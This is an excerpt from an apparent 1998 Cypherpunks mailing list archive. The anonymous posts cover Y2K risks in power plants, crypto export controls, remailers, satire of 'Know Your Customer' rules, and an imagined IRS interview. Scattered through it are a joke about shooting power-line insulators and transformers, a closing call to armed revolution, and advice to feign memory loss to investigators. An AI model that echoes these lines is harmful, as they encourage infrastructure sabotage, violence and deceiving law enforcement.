refinery story; second, I'll offer another review of the nature of the
"embedded" systems that might be at issue.
Power Plant (and refinery) construction . . . .
Remember, power plants and refineries are:
o Capital intensive
o Make increased use of computerized process control systems
o Operate a continuous manufacturing/conversion process employing high
temperatures and pressures.
Typical design life of a coal-fired power plant is 40 years.  During
that period, any number of components *will* fail and *will have to be
replaced.*  Wouldn't make much sense to put a $500million investment at
risk 'cause a $20.00 part failed in some inaccessible location.  Thus
EVERYTHING is accessible.
You want evidence and I'm not about to take you on a power plant tour
but even if you've never been inside a power plant the construction
practice is similar to that found in many other industrial settings and,
if you've ever been aboard a naval vessel or taken a cruise, ships. These settings are nothing like your home (or even an office) with all
the infrastructure components nicely hidden behind walls -- pipes are
exposed and clearly labeled -- power and control cables are laid in
exposed cable trays and risers.  Electronic components are often mounted
in racks with easy access from front and back -- probably not at all
like your computer or home theatre configuration.  All this is to PERMIT
MAINTENANCE, REPAIR and MODIFICATION.
So you need to understand that the problem isn't just maintenance, in
general, or for y2k.  Process plants need to be modified frequently --
market conditions demand a change in inputs or outputs.  Can't get
enough sweet crude?  Exxon doesn't close the refinery -- they modify it
to handle the new feedstock (I got the grand tour from a fellow I knew
who worked at Exxon's Baton Rouge refinery, years ago).
Want some pictures?  Here are a few from several "continuous process"
industries:  and
Now consider the nature of these embedded components.  This has been the
subject of much discussion in csy2k.  I'd like to suggest that there are
three broad categories of components in this context:
o The control system(s) -- SCADA -- one or more intelligent nodes build
on traditional minicomputer, or more recently, microprocessor-based
server technology.  These are very accessible -- they're in, adjacent
to, or very near, the control room.  In an even more modern "distributed
control system," some of the capability will be located in different
areas of the plant.  Nevertheless, they still have to be very accessible

@_date: 1998-12-02 13:35:30
@_author: Anonymous 
@_subject: NZ or LA in Y2K 
Um, start shooting the insulators and pole-transformers? :-P Or, if the power does go out but
Now you're confusing arms fanciers and survivalists with violent racists.
Get a grip.

@_date: 1998-12-02 20:45:06
@_author: Anonymous 
@_subject: "Export" controls 
I cannot give such example because hard crypto products are not available to
the general public.
I am unaware that microshit OS has hard crypto built-in. The only hard crypto
package I have ever seen for sale at mail-order (and thus not anonymous) is
NAI's PGP (and I have never seen any hard crypto available in a store for cash
- but that can only mean that there is no perceived demand).
However, any hard crypto that would work on system level and encrypt all
communications is not available for purchase (it is available for free,
though, in the form of IPSec package with 128-bit block ciphers for
*BSD operating systems.)
There is a number of VPN companies that offer crypto boxes, but AFAIK they
either do not mention crypto scheme they use or they say DES. There is
only one VPN company that advertises 128-bit crypto in it's product.
You'll miss all the fun. After talking to 5-6 departments one concludes
that no one knows anything about 4758, but they are all nice and helpful,
and forward your call to each other. 4758 does not exist for casual callers.
My guess is that if you have been dealing with IBM for some time you may
be able to get it.
To recap, there are no hard crypto drop-in hardware products available to
general public in the USA today.
The question is how to make money by selling hard crypto in the US. NAI seems
to be the only company that can get away with so-called "publishing exception"
in the commercial world. Their joining the key recovery alliance is probably
unrelated :-)
There are many neat ideas. But no hardware.

@_date: 1998-12-02 23:48:34
@_author: Anonymous 
@_subject: No Subject 
I know this is a little off topic, but has anyone
 verified the integrity of a web site called "Spy & CounterSpy" located at The site is basically a citizens' guide to counterintelligence, and covers topics ranging from anonymous email and encryption to evading FBI surveillance.
The author, Lee Adams, claims to have years of experience in these areas but I'm wondering if this site isn't quite what it appears to be -- a site put up by some freedom-loving guy who wants to help everyone enjoy their privacy.

@_date: 1998-12-03 02:01:35
@_author: Anonymous 
@_subject: Matt Blaze arrested??? 
The originating IP for this hotmail posting is lpwa.com, the Lucent
Personalized Web Assistant.  Ken Williams had posted a URL last week
which described how to send anonymous mail using lpwa as a proxy to
the hotmail service:
This is easy to do and provides moderate levels of anonymity.  You set
lpwa.com as your proxy in the browser settings, and then set up your
hotmail account and send the mail.  Maybe Jim Finder was just testing
the idea.
Blaze has attracted one or two cranks who try to harrass him, and this
may be another attempt to make some trouble for him.

@_date: 1998-12-03 05:17:14
@_author: Anonymous 
@_subject: A person who counsels to fail to comply with the Act 
Check out this bit of american slavery:
"Failing to register or otherwise comply with the
Military Selective Service Act is, upon conviction,
punishable by a fine of up to $250,000, impris-
onment for up to five years, or both. A person
who knowingly counsels, aids or abets another to
fail to comply with the Act is subject to the same
 (for teachers, note)
And this anti-FIJA bit: Except as may be authorized by a judge, no person or entity shall
distribute or attempt to distribute any written materials tending to
influence, interfere, or impede the lawful discharge of the duties of a
trial juror, or communicate or attempt to communicate with any person
summoned, drawn, or serving as a trial juror in the Superior Courts in Los
Angeles for purposes of influencing, interfering, or impeding the lawful
discharge of the duties of a trial juror in, or within 50 yards of any
public entrance to, the facilities within which the Superior Courts conduct
jury trials within this County. (Rule 5.2 added and effective 7/1/97.)

@_date: 1998-12-03 05:25:50
@_author: Anonymous 
@_subject: L5 algorithm patent, and free eval version 
Hello Joey et all,
Now that L5 has been patented, will you and your colleagues at Jaws
Technology make the L5 algorithm details available to the professional
cryptography community for independant verification. Could you also
provide the Canadian and/or US patent numbers?
(Announcement of L5 patent:
To cypherpunks readers, the free "shareware" version is available from:
I think the coderpunks readers might enjoy playing with this program. It
has proven entertaining so far for me.

@_date: 1998-12-03 05:41:27
@_author: Anonymous 
@_subject: SASMF, Part 2 
Space Aliens Stole My Freedom, Part 2
Know Your Spineless SheepleNeighbor(TM)
If the banks can be required to Know Their Customers, maybe you
can be required to Know Your Neighbor. This is already an established system in Cuba, so importing it should be cheap,
fast and easy.
"Know Your Neighbor" Requirements
AGENCY: Federal Bureau of Investigation
ACTION: Notice of proposed rulemaking.
SUMMARY: The FBI is proposing to issue regulations requiring
FBI-supervised citizen-residents to develop and maintain "Know Your Neighbor" programs. As proposed, the regulations would require each citizen-resident to develop a program designed to determine the identity of its neighbors; determine its neighbors' sources of gossip and political views; determine the normal and expected comings and goings of its neighbors; monitor household activity for things that are inconsistent with those normal and expected activities; and report any activities of its customers that are determined to be suspicious, in accordance with the FBI's existing suspicious activity reporting regulations. By requiring citizen-
residents to determine the identity of their neighbors, as well as to obtain knowledge regarding the legitimate activities of their neighbors, the proposed regulations will reduce the likelihood that citizen-
residents will become unwitting participants in illicit activities conducted or attempted by their neighbors. It also will level the playing field between citizen-residents that already have adopted formal Know Your Neighbor programs and those that have not.
Minimum steps to take to comply with the Know Your Customer rule.
Identify the neighbor.
Paragraph (d)(2)(i) requires that the Know Your Neighbor program provide a system for determining the true identity of prospective neighbors. If a citizen-resident has reasonable cause to believe that it lacks sufficient information to know the identity of an existing neighbor, paragraph (d)(4)(ii)(A) also requires that the program provide a system for determining the identity of that Determine the source of people and property.
Paragraph (d)(2)(ii) requires that the Know Your Neighbor program provide a system for determining the source of a neighbor's possessions and household members. The amount of information needed to do this can depend on the type of neighbor in question.
Determine normal and expected comings and goings.
Paragraph (d)(2)(iii) requires that the Know Your Neighbor program provide a system for determining a neighbor's normal and expected comings and goings involving the citizen-resident. A citizen-resident's understanding of a neighbor's normal and expected comings and goings should be based on information obtained both when a neighbor relationship is established and during a reasonable period of time thereafter. It also should be based on normal comings and goings for similarly situated neighbors.  Without this information, a citizen-
resident is unable to identify suspicious comings and goings.
Determine if activity should be reported.
Once an activity is identified as inconsistent with normal and expected
behavior, paragraph (d)(2)(v) requires that a citizen-resident
determine if the activity warrants the filing of a Suspicious Activity
Report. This is consistent with a citizen-resident's existing obligations under 12 CFR 353.3(a).
A.	Reasons for and objectives of the proposed rule.
The proposed Know Your Neighbor rule is designed to deter and detect
neighborhood crimes, such as plots to establish "Constitutional
government," gathering of information about alleged "crimes" committed
by government agents, and meeting to discuss subversive literature
such as the Constitution.
B.	Requirements of the proposed rule.
The proposed rule would require citizen-residents to identify their neighbors, determine their neighbors' normal and expected activities, determine their neighbors' sources of possessions and
household members, monitor neighbors' activities to find those that are not normal and expected, and, for activities that are not normal and expected, identify which are suspicious.
Know Your Neighbor monitoring would be similar to monitoring that citizen-residents already do. For example, citizen-residents monitor neighbor activities to ensure that comings and goings
exceeding 100 per month are reported under the Neighborhood Secrecy Act, to ensure that neighbors do not overuse their driveways and
sidewalks, and to ensure that required comings and goings accurate and timely. Editor's Note:
The worst part of this parody is that it's true. Cuba, like most
communist dictatorships, has a highly developed system of block
watchers. They are responsible for all of the foregoing, making
their reports to the secret police.
The U.S. government is instituting a system of "bank account watchers,"
toadies in the supine, excruciatingly closely regulated banking
industry, who will have to "know you," get to know your normal and
expected bank account activity, and watch your bank account activity
to detect and report "Suspicious Transactions."
Welkomm to Orwell's 1984. Welkomm to Nazi Amerika. Hold your arm out
straight... there... this will just sting a bit...
Does anyone not get it yet?
There is _nothing_ in the Constitution that gives the federal
government any power to subject the American people to financial surveillance, to restrict or require reporting of
cash transactions in any quantities, to restrict or encumber
firearms ownership to anyone not actually serving time in a prison, or to do _any_ of the onerous abominations being thrust upon us in new and terrible forms almost daily.
Does anyone not get it yet?
The federal government is forfeiting, just as fast as its
android minions can think up new ways to do it, its last
shreds of any claim to legitimacy. They may as well fly
the skull and crossbones over government buildings. Their
occupation army of marauding thugs is _here_, bringing to
ghastly life the very words of the bill of particulars
laid against King George III of England by the Founders
of this now-decayed, now-corrupt, hollow Republic, in the
Declaration of Independence.
Do they _never_ learn? (Obviously not)
Will we _have_ to go through it all again? (Obviously yes)
Has the line been crossed? (Obviously yes)
Has force been initiated? (Obviously yes)
Has the federal government placed itself outside the law?
(Obviously yes)
So be it.
Cry "Havoc!" and let loose the dogs of war.
The Revolution is upon us. We have nothing to lose but our imminent slavery. Sam Adams has a piece of advice: Keep your
own counsel. Translation: Do your own thing and don't look
to prop up your courage with the flawed courage and lack of
trustworthiness of others. Don't be a groupie -- be a
Required re-reading:

@_date: 1998-12-03 06:58:53
@_author: Anonymous 
@_subject: SASMF, Part 1 
Space Aliens Stole My Freedom, Part 1
Know Your Gutless SheepleCustomer(TM)
Let's just take a peek at how the new FDIC proposed reg would
look if transposed into an FCC setting:
"Know Your Customer" Requirements
AGENCY: Federal Communications Commission
ACTION: Notice of proposed rulemaking.
SUMMARY: The FCC is proposing to issue regulations requiring
FCC-supervised communications carriers to develop and maintain "Know Your Customer" programs. As proposed, the regulations would require each carrier to develop a program designed to determine the identity of its customers; determine its customers' sources of communicated information; determine the normal and expected calls of its customers; monitor account activity for calls that are inconsistent with those normal and expected callss; and report any calls of its customers that are determined to be suspicious, in accordance with the FCC's existing suspicious activity reporting regulations. By requiring communication carriers to determine the identity of their customers, as well as to obtain knowledge regarding the legitimate activities of their customers, the proposed regulations will reduce the likelihood that communications carriers will become unwitting participants in illicit activities conducted or attempted by their customers. It also will level the playing field between
carriers that already have adopted formal Know Your Customer programs
and those that have not.
Minimum steps to take to comply with the Know Your Customer rule.
Identify the customer.
If a communication carrier offers private leased communication services, it is important that the carrier understand a customer's personal and business background, source of information to be communicated, and intended use of the private leased communication services.
The extent of the information regarding the customer that may be necessary to fulfill the carrier's Know Your Customer obligations should depend on a risk-based assessment of the customer and the calls that are expected to occur, and should be addressed within the communication carrier's Know Your Customer program.
Determine the source of information.
Paragraph (d)(2)(ii) requires that the Know Your Customer program provide a system for determining the source of a customer's information. The amount of information needed to do this can depend on the type of customer in question.
Determine normal and expected calls.
Paragraph (d)(2)(iii) requires that the Know Your Customer program provide a system for determining a customer's normal and expected calls involving the communication carrier. A carrier's understanding of a customer's normal and expected calls should be based on information obtained both when an account is opened and during a reasonable period of time thereafter. It also should be based on normal calls for similarly situated customers.  Without this information, an institution is unable to identify suspicious Monitor the calls. Paragraph (d)(2)(iv) requires that the
Know Your Customer program provide a system for monitoring, on an ongoing basis, the calls conducted by customers to identify calls 'that are inconsistent with the normal and expected calls for particular customers or for customers in the same or similar categories or classes.' The proposed regulation does not require that every call of every customer be reviewed. Rather, it requires that a financial institution develop a monitoring system that is commensurate with the risks presented by the accounts maintained at that Determine if call should be reported.
Once a call is identified as inconsistent with normal and expected
calls, paragraph (d)(2)(v) requires that a communication carrier
determine if the call warrants the filing of a Suspicious Activity
Report. This is consistent with an carrier's existing obligations
under 12 CFR 353.3(a).
A.	Reasons for and objectives of the proposed rule.
The proposed Know Your Customer rule is designed to deter and detect
communication crimes, such as obscene phone calls, getting tax advice, and discussing the Constitution.
B.	Requirements of the proposed rule.
The proposed rule would require communication carrier to identify their customers, determine their customers' normal and expected calls, determine their customers' sources of information communicated in calls, monitor calls to find those that are not normal and expected, and, for calls that are not normal and expected, identify which are suspicious.
Know Your Customer monitoring would be similar to monitoring that communication carriers already do. For example, communication carriers monitor customer calls to ensure that calling volumes exceeding 10,000 per month are reported under the Communications Secrecy Act, to ensure that customers do not overuse their telephones, and to ensure that required calls are accurate and timely. Editor's Note:
Putting this in an FCC context makes it pretty clearly bizarre
and unconstitutional, doesn't it? Where do these fuckers get
off pulling this Nazi shit? Just to carry it all the way into
Wonderland, we've drawn up this questionnaire, also in the telephone context:
Sample Questionnaire
1. Is this a __residential or __business account?
2. Approximately how many calls do you expect per month?
    a. Incoming ____
    b. Outgoing ____
3. List the subject matter of expected calls (use extra
   sheets if necessary: ____
4. List the telephone numbers from which you expect to
   receive calls (use extra sheets, etc.) ____
5. List the telephone numbers to which you expect to    place calls (use extra, etc.):____
6. List the names of people with whom you expect to speak:
7. List the Social Security numbers of people with whom
   you expect to speak: ____
8. List the political organizations to which you belong:
9. List the political organizations to which people with
   whom you expect to speak belong: ____
10. Are any of the organizations in (8) or (9) on the     Attorney General's list? Yes__  No__
11. If the answer to (10) was Yes, do you have a current
    and valid waiver for that (those) organization(s)?
    Yes__  No__
12. If the answer to (11) was No, proceed directly to
    federal prison. Do not pass urine; do not collect
    $200 from any ATM.
13. Do you regularly call your mother?  Yes__  No__
14. If the answer to (13) was Yes, list the topics you
    commonly talk about with your mother (use extra, etc.)
15. What are your sources of information for your
    telephone conversations?____
16. List all facts known to you, about which you expect to
    speak in your telephone calls:____
17. List all times at which you expect to receive or place
    calls:____
18. Attach transcripts of all conversations you expect to
    have. In lieu of transcripts, recordings may be attached.
19. Staple this form to your head, jam a toilet plunger
    handle up your ass, waddle to the nearest telephone,
    dial "1" and say, "I'm ready. Pick me up." Wait at
    your front door.

@_date: 1998-12-03 08:26:58
@_author: Anonymous 
@_subject: No Subject 
Even more interesting is the fact that Congress was going to do away with the Selective Service a few years ago but President Clinton (accused of draft dodging during the Vietnam War) opposed getting rid of it.

@_date: 1998-12-03 13:46:03
@_author: Anonymous 
@_subject: I Got Mine 
Hello, I'm Special Agent Murfrock of the IRS and this is Special Agent Prenfrew. We'd like to speak with you about C. J. Parker, maybe known to you as "Toto" or "TruthMonger..."
Sorry, I don't recognize any of those. Isn't Toto the dog?
The dog?
Yes, Dorothy's dog in... (stops when he notices that the agents are
scribbling furiously in their notebooks)
May we come in?
No, I was just about to go to sleep. I'm not well.
Sorry to hear that. We have an e-mail here that you sent to Toto, and another he sent back to you...
May I see those? (takes the printouts)
Sorry, doesn't ring a bell.
Well, if you look at those headers, the ones circled in red, you
will see that...
You must be kidding! There are more people forging e-mail headers
than live in St. Louis! Everybody knows that.
Would you mind if we just come in for a moment?
Yes, I would. I told you, I am going to sleep.
Would you mind if we look at your computer?
Why would you want to do that?
Well if you didn't send or receive these messages, you have nothing to worry about.
I don't see any reason to do that.
We can get a warrant, very quickly, as a matter of fact. If you
cooperate, things will go better for you.
I love to cooperate. I want to cooperate. I am cooperating to the
fullest extent I believe is required of me. Ask me something that
makes sense and I'll answer it.
Have you ever heard of a group called the Cypherpunks?
It rings a bell.
Are you a member?
How do you explain the fact that we found your e-mail address on
a Cypherpunks membership list in a computer we seized?
I have no idea. I don't join organizations.
Are you a member of the Majordomo organization?
No. The only majordomo I've ever heard of is a mail list manager.
Where have you seen this Majordomo?
Oh, everywhere. I think it's worldwide in scope.
(scribble scribble)
It's some kind of utility program. Everybody uses it.
(scribbling stops)
What can you tell us about it?
Nothing, really. If you want to get on a mail list you send a
"subscribe" message to a majordomo. If you want to get off, I
think you send an "unscrive" message.
Have you ever done that?
Maybe. I don't recall. Anyone can submit your e-mail address to lists, so you don't even have to subscribe to be on an e-mail list. And there's so much spam these days that I don't recognize half the stuff I get. Spam? (the agents look at each other)
Junk e-mail. I delete most of my e-mail without even reading it.
Sometimes my email program crashes and it all gets deleted before
I can look at it.
(scribble scribble)
How many lists have you joined?
I don't remember. I never paid any attention to those things,
and since I banged my head three months ago, I haven't been
remembering a lot of things.
(scribble scribble)
So, are you denying being a member of the Cypherpunks?
I don't know what that means.
Have you ever subscribed to the Cypherpunks e-mail list?
I have no idea.
You have no idea? You don't remember?
I don't know what I've subscribed to, unsubscribed from,
what I get, don't get. E-mail is a complete mess and I
ignore most of it. I'm really not very good at those
May we look?
Are you going to make us get a warrant?
Get what you like. My disk crashed last week and I threw it away.
Lost everything. In fact I just formatted my new disk and the only data on it is manuscripts for the columns I write.
I write for a magazine and a couple of newspapers.
(oh shit)
(scribble scribble)
Oh yeah? Which ones?
I don't think that's appropriate.
Well, we'll be back. Here's my card in case you think of anything
you'd like to tell us.
One more thing. Have you ever been invited to join something
called The Circle of Eunuchs, e-u-n-u-c-h-s?
I don't recall ever hearing of anything like that.
Do you know who Tim May is?
Nope. Sounds like a real common name, though.
How about Blanc?
Is that French?
Never mind. Thanks. We'll be seeing you.
(I don't _think_ so)

@_date: 1998-12-03 14:06:28
@_author: Anonymous 
@_subject: I Got Mine 
Pre-schoolers'R'Us. You got a visit from the advance guys.
Admissions, admissions.
Would some duly licensed bar attorney on this list PUH-LEEZE tell
these children how to behave in the presence of criminal inquisitors?
So _you_ say! They open doors; you walk through them; you can easily find yourself in Wonderland. Don't come crying to _me_!
There is no such thing as a "conversation" with them; there is only an "interrogation." Everything you say is interpreted as an admission, a denial, or an evasion. You are a perp. You are dogshit. You mean you heard more _allegations_? If you're not careful, your neighbours will be the next ones to be
"discovering things we didn't know" about _you_. That's the way they
turn people against targets, and anyone they interview can become
another target in the blink of an eye.
Alleged, and only to _you_ as far as you know...
Alleged, and only to _you_ as far as you know...
GodDAMN! I'm glad you're not a friend of mine! I don't know if I even
want to _know_ whether you're wearing panties or not anymore.
Geez! I wonder what you must gush up about your _enemies_!
Yeah, that's funny. It should also have set off all your alarm bells
that you're dealing with clueless fuckwits who can't find their fly
without a map and whose only interest in life is putting anybody
they can in prison, on any excuse whatsoever. If they can weave together a Circle of Eunuchs or a Cult of the Kernel or a conspiracy of Fanatic Followers of the Seashell, they'll be content to do it. You could tell them that the leader of the militant arm of the Circle is the infamous but cryptic "General Error" and they'd write it down with a straight face.
To you, it's a joke. To them, it's a statement with possible evidentiary value. And nothing's funny.
You don't explain _anything_ to them. You can only give them leads and evidence. Of course, if you *insist* on having such a fucking good memory and on gushing on about all sorts of things, well, don't be surprised if they conclude that you _do_ know a lot about this Toto stuff, after all, and maybe merit another, more probing interview.
I'll _bet_ you did! Sounds like you made a nearly _perfect_ subject for interrogation.
Ooooooo! That sounds _delicious_! You can entertain attorneys with that one. You will be thrilled at the wondrous range of awful expressions they make. Some may even quietly throw up in a corner.
Shows how much _you_ know. And now you get your legal advice from the IRS CID? That's really Nice of them. Did they indemnify should you rely on their advice and get busted or sued? Didn't think so.
"Hyperseriously" is more like it.
You're a regular motormouth, aren't you? Now they have you knowing
a lot more about Toto-ish things than just the email showed, they have you red-flagged as "attempting to draw the agent into arguments about law or the Constitution," they have you flagged as being way too bright for an innocent person, and demonstrating an interest in discussing the technicalities of the law on threats to public officials, which interest, just coincidentally, happens to dovetail quite nicely with the essential subject matter of their investigation. I'd give pretty good odds you're going to get another visit. If you don't have a lawyer present on the next one, I'd say you're, uh, sorry, there's just no other word: _stupid_.
Ooooooo! Lovely! FUD! Big time FUD! Divide and conquer FUD! CJ becomes
the bad guy for not cutting a deal and instead inconveniencing all those busy Cpunks, all of them probably suddenly writing code instead of flaming each other in endless and pointless threads of non-crypto!
Of _course_ it would! More "conversation," leads, admissions,
denials and evasions! More grist for the mill! More perps! Get them
to pick up the tab -- they'll be able to put it on their expense
reports! It's called an informal group interrogation.
Geez, how can bright people be so fucking STUPID?
Doh! It's his _job_ to be interested in a subject matter touching on an active investigation.
Geez! Don't you realize that they _are_ the Dark Side! Have you been living under a rock for the last few decades?
"You know, Gunther, those Gestapo men who visited last night to ask about the Goldblums next door were very polite. One of them expressed great interest in concepts and discussions of Judaism, and Jewish family trees. I described something of what the religion is about and referred him to some libraries and gave him some titles to read. I'm sure, given a little time and several dinners, we could convert him to our side."
Right. Maybe you understand now why I'm not on the Cpunks list?

@_date: 1998-12-03 14:33:57
@_author: Anonymous 
@_subject: I Got Mine 
I have this really, really bad memory problem. It gets worse
under stress. I also have this metaphysical dilemma thing.
I know the guy next door. I guess. Actually I don't know him.
I've called him Joe, but it wouldn't be right for me to say
to anyone official that his name is Joe, because I've never
checked his ID, so I don't really know, and even if I had
checked his ID, I still wouldn't _know_, would I? He's always
been a nice fellow, and I wouldn't want to cause him undeserved
harm by leaping to conclusions about him. Does he have a wife?
I don't know. I may have seen a woman around his place, but
I couldn't leap to the conclusion that she is his wife. I
might assume so out of courtesy to them, but I wouldn't presume
to tell someone official that he is Joe or that he has a wife,
because I really don't know. Most of what I _think_ I know,
and which serves quite well for inviting each other to our
barbeques and for borrowing small tools, is stuff I don't
actually _know_ and don't care about one way or another.
And that affects my memory when people ask questions about
him. Did I see those two young men snatch a purse from that lady over there? Yes. Can I describe them? Yes. Did I notice what they were wearing and in which direction they ran? Yes.
Do I know anything about Joe? Nope. Does he have a wife? I
have no idea. What does he do for a living? Gosh, I have no
The law requires you to give up information you have when asked by a law enforcement officer investigating a crime.
The law does not and cannot require you to notice things or
to have a good memory. If your memory gets worse as the
things being investigated stray farther and farther from
common law crimes and into the realm of "bureaucrime" and
thought crime, well, that's just too fucking bad.
I'd make a really bad juror, too. It's not a memory thing there,
it's more of a comprehension thing. I just have trouble seeing
guilt if the law itself is bogus. Not guilty. What? Are you
crazy? They had him dead to rights laundering money! Sorry, I
just can't believe the evidence. It just doesn't add up for me.
Explain why not! Sorry, I can't. It just doesn't work for me.
If more people had these problems, all the bureaucrimes and other
victimless crimes would, sadly, be history overnight. The IRS would lose every single case that went to a jury, and within months the income tax would be repealed, a no-audit, no-go-to-
jail sales tax would be in place, and most of the people working for the IRS would be looking for a new job. I would be
very saddened by the rude reality of all that, but, hey, what
the hell?
Will these problems that afflict me spread? You'd better hope your sorry ass they do! If they don't, we're all in for a very
rough ride, and not 50 years from now, but tomorrow and next
year. We're already well down the slippery slope. Personally,
though, I think we're in for a shitstorm. That's because
people are basically unprepared for the degree of evil that
has been refined and distilled in government. They're still
way too willing to spout off about things they don't even know, to presume the worst, even of their friends and acquaintances, to play full rube right into the hands of
truly evil people who have _their_ act down to a science.
If large scale genocide has been going on all through the last
several years in Bosnia while people on this list have been consumed in flame wars and pseudo-propellor-head duels on a
scale of delicacy of the medieval mace, how much more easily
can and does largely bloodless subjugation take place all
around us? If people can allow Ruby Ridges and Wacos to take
place without congressional offices being _filled_ every day
with outraged citizenry and recall petitions being launched
for every politician who even hesitates in taking a firm stand,
how can we think that the gradual sapping of our liberty will
evoke a response until things first get very, very bad.
There is a peaceful solution available today. At one level you
don't have to have a good memory in all things to be a law-
abiding and responsible citizen-unit. Just say "No, I don't
remember" about things that are none of your business. At another level, you don't have to put up with bureaucrimes when you sit on a Grand Jury or a trial jury. Just say "No." Don't argue; don't convince; just say "No" across the board to bureaucrimes. It takes 51% of the voters to win an election. It only takes 5% of the jurors to kill a bad law.
Nothing else will work. Nothing else has ever worked. If this
is not done now, we will all face terrible choices and
tragedies within as few as ten years.

@_date: 1998-12-03 16:34:31
@_author: Anonymous 
@_subject: "Export" controls 
Macroshit ? But I digress.
Their architecture has real $$ value because it cracks 99% of "encrypted"
Offering the real stuff for sale in US requires some investment. Whether it
is hardware (128-bit crypto engine on a PCI card ?) or software plug-in
for the aforementioned OS that makes all traffic go through IPsec with
128-bit non-DES block cipher, some amount of money must be put to a risk.
We are not talking here about free stuff. We are talking about products
that can be deployed by non-programmers, businesses etc., that will be
supported professionally (the perceived quality of professional support
vs. free stuff is immaterial here.)
Hardware is overkill for the single voice line. PGPfone works fine there.
If there is a demand, it will be done. Let's run a small poll:
How much would you pay for transparent hardware/software solution that
encrypts all traffic between peer users (assuming all rational crypto
requirements are met, like available source code etc.) ?
The main problem with hard crypto is that it is so equalizing. Any pauper
can cheaply encrypt and make it hard for any government to break. This is
not the case with guns, where more resources almost linearly buy more power.
One of the posters mentioned that PGP is retailed in CompUSA. My mistake, I
did not check them (but I did check 3 other big chains).
On the wild side, suppose that all crypto restrictions are terminated. Some
would say that now "they" can break all available stuff. In any case the
value of crypto products in the eyes of buyers would fall. If it is legal
it is no good. Most of the research would lose the best people. Cypherpunks
would cease to exist. A very dangerous proposition.

@_date: 1998-12-03 20:01:18
@_author: Anonymous 
@_subject: blanc's MIB 
How did you authenticate them, or why was it unnecessary?
Should have said, "I 'know nothing' about such things"
 One of the investigators
it, and
Or he could have gotten more intelligence from you.

@_date: 1998-12-03 22:54:54
@_author: Anonymous 
@_subject: No Subject 
Is anyone aware of any critical evaluations performed on the security of the Network Associates (a.k.a. McAfee) PGP for Personal Privacy?  Traditionally, PGP source code has always been available for evaluation by the Net community, but this isn't the case with the newer commercial versions.
Additionally, and this is a bit paranoid, but PGP in the past has come with digitally signed files to authenticate the integrity of the files.  Once again, commercial versions offer no such guarantee that the software hasn't been tampered with between the factory and the store shelves.

@_date: 1998-12-04 09:05:58
@_author: Anonymous 
@_subject: Mixmaster client 4 the Mac OS? 
I heard sometime last summer that the mixmaster client was being ported to the Mac. Does anyone know the status of this project?

@_date: 1998-12-05 00:39:11
@_author: Anonymous 
@_subject: joy of export, h/ware 
Not really.  Interesting question.  Open a delaware corporation and sell munition-quality gate arrays in the back pages of Popular Electronics
or EE Times... keep us posted...
Duh :-)
* 10,000 gates cost less than a paper clip.  500K is high for a block cipher.
* If we don't find something to do with them, at the rate we're producing
the earth will be covered with silicon and its compounds soon.   :-)
* Its not like we'd ever put floating point routines, or blitting routines,
out of business by integrating those functions in Si, is it?
Naah, we'd never accelerate encryption with hardware, the CPU is bored and has nothing better to do, and its soooo expensive
to print chips..
(That being said, I'll point out to myself how many asics have been replaced
by dsps...but not without some inefficiency)
* PGPfone on a  very fast cpu plus fast link is still less pleasant than
a noisy cordless (no pun intended).
* We'd never take encryption hardware through the same path as modems,
would we?
First used between companies, then used for remote access, eventually you
can't buy a bloody machine without one.  Getting cheaper, faster, closer
to the motherboard, taken for granted by applications.  Ever seen a 300
baud, 40 lb modem, cost probably $3000 in 1970 dollars?  The final level of deployment is when garage-door-openers, car remotes, and
childrens' toys (e.g., radio controlled cars) use encryption chips... or
chips with encryption, anyway.
Yes, the PC can be used as an untrusted router if the encryption is done
outside it.  The outside encrypting unit should also perform NAT, otherwise
the PC (doing the tunnelling) can broadcast traffic ('trap and trace' in
the pots world)
info.  The lower power used in PDAs really helps keep the boys in the White
Across the Street busy.
Email is so low-bandwidth that software suffices.  Secure video
conferencing on your
Dick Tracy (tm) telewatch needs h/w support.
--- Is 5% of YOUR communications encrypted or anonymous in '98 ??  ---

@_date: 1998-12-05 01:13:05
@_author: Anonymous 
@_subject: Wassenaar Statement 
If these reports are correct, the United States could end up being one of
the countries with the most LIBERAL export controls.
In the United States, it is currently legal to export any cryptographic
software you like - as long as it is in printed form.  This is because
of fears of violating the First Amendment.  Not all countries have such
strong conventions for protecting the printed word.
PGP source code is being exported in printed form, scanned in overseas,
and then distributed from there.  If the Wassenaar Arrangement prevents
it from being exported from its current overseas distribution site,
a solution can be to ship it in printed form from the U.S. to a wide
range of other countries.  As long as those countries don't prohibit
domestic distribution of crypto software, strong cryptography can still
be made available almost everywhere.
The PGP source code books begin with a section that is, in effect, a
"how-to" for printing software in such a way that it can be reliably
scanned.  Each page and each line has a checksum.  The books come with
a Perl script short enough to enter by hand that does basic checksum
verification.  This is used to read a second, longer Perl script that
can do error correction; and this is then used to bootstrap into the
full script which will read the books, create all the files, organize
the directories, and reconstruct the entire source code tree.
It may be that in the future this will be the most effective way to
communicate internationally about security software.  It would be
good for other groups to become familiar with this technology which has
been pioneered by PGP.

@_date: 1998-12-05 03:02:51
@_author: Anonymous 
@_subject: export of printed crypto [Was Re:Wassenaar Statement] 
The PGP source code is open, published in book form and
this gets stronger 1st amendment protection.
US crypto companies have also read the relevant portions
of the EAR. Yet, none, to my knowledge, have tried this.
Would any attorney reading the list care to comment?
The EAR clearly states that printed crypto is not subject
to the EAR whether the material is publically disseminated
or not.
Anyway, about one second after somebody did this another extra- constitutional "emergency" executive order would prohibit it.
 -Wassenaar

@_date: 1998-12-05 09:35:02
@_author: Anonymous 
@_subject: . 
Well, the existing remailer net doesn't make "Pretty Good" anonymity very
feasible. I'd think something based on the general idea behind Crowds.
(Furthermore, most remailer structures still can't erase some other security
concerns --
  1: remailers acutally can be hacked or physically compromised
  2: clients really can be screwed
  3: etc.
To help solve the first, you'd want a two-box setup doing remailing, with the
security-critical stuff loaded on a box not directly connected to the Net with
something 140-1ish to make tampering harder, a secure OS, etc. -- or, of
course, you can scrap all that to get really big remailer count.
To help solve the second problem, there needs to be a better web-of-trust setup -- that is, one which applies to code as well as keys. Those who wish to
verify code get a .sig-verifying program from a trusted source then use a WoT
to authenticate various facets of the program necessary for security.
A solution to the third problem is expected RSN.)
Remember the consequences to an adversary who uses its secret decoder ring,
though: the more plausible it becomes that a certain source is being used for
intelligence-gathering, the more likely it is that that source will promptly
begin to run dry as the spied-upon realize that Something Got Broke.  My
advice, however, agrees with that of the other Anonymous. That is, unless
you've really thought things out, think of an remailed message as merely
.sigless, not anonymous.

@_date: 1998-12-05 10:26:14
@_author: Anonymous 
@_subject: PGP Disk 
I'm sure somebody will check if they are bored some day. Where can we find
the source code?
